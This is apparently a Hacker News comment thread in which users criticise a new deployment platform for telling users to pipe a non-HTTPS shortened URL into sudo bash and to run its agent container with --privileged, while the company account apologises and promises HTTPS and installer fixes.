[lclarkmichalek]

Did I really just see a screenshot telling the user to, on their server, pipe the contents of a non-HTTPS, goo.gl URL into a sudo bash?

http://lastbackend.com/images/landing/timeline/deploy_2.png

[jroll]

And in the docs[0], the manual instructions ask you to run their agent container with --privileged=true, which gives the container access to all devices on the host and more.[1]

Looks super neat but I'll pass.

[0] http://lastbackend.com/guide/ [1] https://docs.docker.com/reference/run/

[lastbackend]

Hm.. try to start it without --privileged. WI think it's not necessary now. I don't remember the main reason why we use that flag. Please try without and can you send me feedback about. If it will work good - we'll update installer. Thx you!

[jsmthrowaway]

> I don't remember the main reason why we use that flag.

Troubling.

[mentat]

Having access to the docker socket which runs as root seems equivalent.

[lastbackend]

Exactly! I asked our developer team and they said me this reason.

[lastbackend]

Yeah... sorry for that.. We will fix it on Monday also HTTPS. It's not good, but we tried to open product faster!

[subway]

Security should not be an afterthought. Especially not when you're trying to get me to trust my data to your platform.

[lastbackend]

You are right. But you can play with our platform this weekends, and on next week we'll opening agent to open-source and enable security. We have some delay with SSL delivery. :(

[tpg]

When I see security as a second-class citizen on user-visible elements, I assume that the same philosophy was applied on the parts I can't audit, even after the front-end stuff was fixed.

[runlevel1]

Just get a free cert from StartSSL while you wait for your other cert to go through. It's better than nothing.

Asking people on HN to send their passwords in the clear is suicide.

[antocv]

I, for one, aint playin with anything you build. You aint coming close to having sudo on any of my machines if I can help it.

This shit with "enable security" as after-thought has to stop.

[meddlepal]

I agree. Basically makes me distrust the whole thing inside and out; who knows what other bs engineering practices were used in non visible parts of the stack? Shipping is great, but please don't ship insecure stuff as a product you want customers to use. Please.

[lastbackend]

We are enabled HTTPS. THX for your comments.

Next: installer update. Give us few minutes.

[tlrobinson]

That attitude might work for a social network for cats, but it's not going to fly if you're asking users to trust you with their production servers.

[giovannibonetti]

You can get HTTPS for free (and hassle-free) if you use Cloudflare as your DNS server. Disclaimer: I am doing this publicity as a happy customer, without earning anything in return.

[tokenizerrr]

It's a bit more than DNS. It's sending all of your traffic through cloudflare, and they cache content/act as a CDN. But they can theoretically inspect/modify all traffic.

[lclarkmichalek]

Fair enough. Regardless, congrats on the release.